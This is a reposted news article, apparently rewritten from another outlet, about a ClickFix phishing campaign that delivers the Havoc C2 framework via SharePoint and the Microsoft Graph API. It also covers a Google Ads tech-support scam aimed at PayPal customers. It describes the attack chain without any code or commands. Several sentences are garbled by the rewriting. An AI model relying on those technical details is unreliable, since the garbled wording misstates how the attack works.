Close Menu
  • Home
  • Identity
  • Inventions
  • Future
  • Science
  • Startups
  • Spanish
What's Hot

Who is the AI ​​Browser for?

TikTok robot star Rizzbot gave me the middle finger

India, where BlaBlaCar once exited, is now its largest market.

Facebook X (Twitter) Instagram
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
  • User-Submitted Posts
Facebook X (Twitter) Instagram
Fyself News
  • Home
  • Identity
  • Inventions
  • Future
  • Science
  • Startups
  • Spanish
Fyself News
Home » Hackers deploy PowerShell-based Havoc C2 via SharePoint sites using Clickfix Trick
Identity

Hackers deploy PowerShell-based Havoc C2 via SharePoint sites using Clickfix Trick

userBy userMarch 3, 2025No Comments2 Mins Read
Share Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Copy Link
Follow Us
Google News Flipboard
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link

March 3, 2025Ravi LakshmananCybercrime/Malware

Click fix trick

Cybersecurity researchers are turning their attention to a new phishing campaign that employs the Clickfix technique to provide an open source command and control (C2) framework called Havoc.

“Threat actors hide each malware stage behind SharePoint sites and use a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted and well-known services.”

The starting point for the attack is a phishing email containing HTML attachments (“documents.html”) that displays an error message when opened. Use the click fix technique to copy the user and run it to a terminal or powershell, then delete the next stage.

Cybersecurity

This command is designed to download and run PowerShell scripts hosted on an adversarial SharePoint server. If the newly downloaded PowerShell does not already exist on your system, checks whether it is running within a sandbox environment before downloading the Python interpreter (“Pythonw.exe”).

HAVOC C2 via SharePoint Site

The next step is to get and run a Python script from the same SharePoint location that acts as the same SharePoint load, which acts as the shellcode loader for kaynldr ​​written in C and ASM, which can launch embedded DLLs.

“Threat actors use Havoc in conjunction with the MicrosoftQ Graph API to hide C2 communications within famous services,” Fortinet said, supporting the framework to gather information, perform file operations, execute commands and payloads, token operations, and Kerberos attacks.

The development comes as MalwareBytes revealed that threat actors continue to exploit known loopholes in their Google Ads policies, targeting PayPal customers with fake ads provided through advertiser accounts that may have compromised.

Cybersecurity

The ads are trying to trick victims searching for payments in order to call fraudulent numbers that end up handing over personal and financial information, looking for assistance related to account issues or payment concerns.

“A weakness within Google’s policy of landing pages (also known as the final URL) allows anyone to impersonate a popular website as long as the landing pages and display URLs (web pages displayed in the ads) share the same domain,” says Jérôme Segura, senior director of research at Malware Bytes.

“Tech support scammers are like vultures circling above the most popular Google search terms, especially when it comes to all kinds of online support and customer service.”

Did you find this article interesting? Follow us on Twitter and LinkedIn to read exclusive content you post.

Source link

Follow on Google News Follow on Flipboard
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Previous ArticleAt least one person was killed after a car drove into a crowd in Mannheim, Germany | Crime News
Next Article When Skype is closed, its legacy is mass end-to-end encryption
user
  • Website

Related Posts

Smishing Triad links to 194,000 malicious domains in global phishing operation

October 24, 2025

Critical, newly patched Microsoft WSUS flaw exploited

October 24, 2025

APT36 targets Indian government with Golang-based DeskRAT malware campaign

October 24, 2025
Add A Comment
Leave A Reply Cancel Reply

Latest Posts

Who is the AI ​​Browser for?

TikTok robot star Rizzbot gave me the middle finger

India, where BlaBlaCar once exited, is now its largest market.

Obvious security risks of AI browser agents

Trending Posts

Subscribe to News

Subscribe to our newsletter and never miss our latest news

Please enable JavaScript in your browser to complete this form.
Loading

Welcome to Fyself News, your go-to platform for the latest in tech, startups, inventions, sustainability, and fintech! We are a passionate team of enthusiasts committed to bringing you timely, insightful, and accurate information on the most pressing developments across these industries. Whether you’re an entrepreneur, investor, or just someone curious about the future of technology and innovation, Fyself News has something for you.

Meet Your Digital Twin: Europe’s Cutting-Edge AI is Personalizing Medicine

TwinH: The AI Game-Changer for Faster, More Accessible Legal Services

Immortality is No Longer Science Fiction: TwinH’s AI Breakthrough Could Change Everything

The AI Revolution: Beyond Superintelligence – TwinH Leads the Charge in Personalized, Secure Digital Identities

Facebook X (Twitter) Instagram Pinterest YouTube
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
  • User-Submitted Posts
© 2025 news.fyself. Designed by by fyself.

Type above and press Enter to search. Press Esc to cancel.